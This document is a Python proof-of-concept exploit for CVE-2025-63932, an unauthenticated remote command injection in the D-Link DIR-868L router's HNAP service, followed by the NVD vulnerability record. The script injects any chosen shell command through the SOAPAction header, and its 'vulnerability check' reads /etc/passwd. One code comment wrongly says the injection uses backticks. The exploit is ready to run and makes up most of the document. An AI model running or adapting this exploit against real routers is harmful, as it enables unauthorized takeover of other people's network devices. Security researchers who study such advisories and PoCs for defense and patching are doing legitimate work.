CVE-2025-63932

#!/usr/bin/env python3 """ CVE-2025-63932 PoC - D-Link DIR-868L Unauthenticated RCE via SOAPAction Header Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-63932 """ import requests import sys def exploit_dlink_rce(target_ip, target_port=80, cmd="id"): """ Exploit CVE-2025-63932: Unauthenticated RCE in D-Link DIR-868L HNAP service Args: target_ip: Target router IP address target_port: Target router port (default: 80) cmd: Command to execute on the target system Returns: Response from the exploited service """ url = f"http://{target_ip}:{target_port}/HNAP1/" # Construct malicious SOAPAction header with command injection # The HNAP service does not filter the SOAPAction header field # Inject command using backticks for command substitution payload = f'{{";{cmd}#}}' headers = { 'SOAPAction': payload, 'Content-Type': 'text/xml', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-63932)', 'HNAP_AUTH': '1234', # Some endpoints may require this header 'Cookie': 'uid=1234567890' } # XML payload for HNAP request xml_body = '''<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://purenetworks.com/HNAP1/"> <soap:Header> <tns:HNAPAuth xmlns:tns="http://purenetworks.com/HNAP1/">1234</tns:HNAPAuth> </soap:Header> <soap:Body> <tns:Login> <Username>Admin</Username> <LoginPassword></LoginPassword> <Captcha></Captcha> </tns:Login> </soap:Body> </soap:Envelope>''' try: print(f"[*] Targeting {target_ip}:{target_port}") print(f"[*] Executing command: {cmd}") response = requests.post(url, headers=headers, data=xml_body, timeout=10, verify=False) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") print(f"\n[+] Response Content:\n{response.text[:1000]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def check_vulnerability(target_ip, target_port=80): """ Check if target is vulnerable to CVE-2025-63932 """ print(f"[*] Checking if {target_ip} is vulnerable...") # Try to execute a safe command to verify vulnerability exploit_dlink_rce(target_ip, target_port, "cat /etc/passwd") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-63932.py <target_ip> [port] [command]") print("Example: python cve-2025-63932.py 192.168.0.1 80 'id'") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 command = sys.argv[3] if len(sys.argv) > 3 else "id" exploit_dlink_rce(target, port, command)

{"cve": {"id": "CVE-2025-63932", "sourceIdentifier": "[email protected]", "published": "2025-11-19T20:15:53.817", "lastModified": "2025-12-11T18:23:31.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link Router DIR-868L A1 FW106KRb01.bin has an unauthenticated remote code execution vulnerability in the cgibin binary. The HNAP service provided by cgibin does not filter the HTTP SOAPAction header field. The unauthenticated remote attacker can execute the shell command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-868l_firmware:fw106krb01:*:*:*:*:*:*:*", "matchCriteriaId": "42356994-7EBF-4E6B-A13E-8FFE91DD30CB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*", "matchCriteriaId": "0D8A8303-F830-477F-8944-F1149A0CD521"}]}]}], "references": [{"url": "https://github.com/WhereisRain/DIR-868", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/WhereisRain/DIR-868/tree/main", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Product"]}]}}